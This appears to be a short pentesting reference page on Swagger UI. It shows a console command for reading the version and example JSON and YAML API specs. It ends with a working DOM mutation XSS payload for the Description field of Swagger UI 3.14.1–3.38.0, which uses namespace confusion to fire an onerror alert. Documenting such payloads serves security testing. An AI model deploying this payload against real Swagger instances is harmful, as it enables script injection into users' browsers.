Swagger UI
Version
On Browser console:
JSON.stringify(versions['swaggerUi']['version'])
Documentaion example files
api.json
{
"swagger": "2.0",
"info": {
"title": "Example json.spec",
"description": "Description Text"
},
"paths": {
"/accounts": {
"get": {
"tags": ["accounts"],
"summary": "Finds all accounts",
"operationId": "findAccounts",
"responses": {
"200": {
"description": "No response was specified"
}
}
}
}
}
}
api.yaml
swagger: '2.0'
info:
title: Example yaml.spec
description: |
Description Text
paths:
/accounts:
get:
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findAccounts
summary: Finds all accounts
DOM XSS
Swagger 3.14.1 - 3.38.0 with vulnerable DOMPurify version
DOM Mutation XSS with namespace confusion in
Descriptionfield<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title=\"</textarea><img src='#' onerror='alert(window.origin)'>\">
Last updated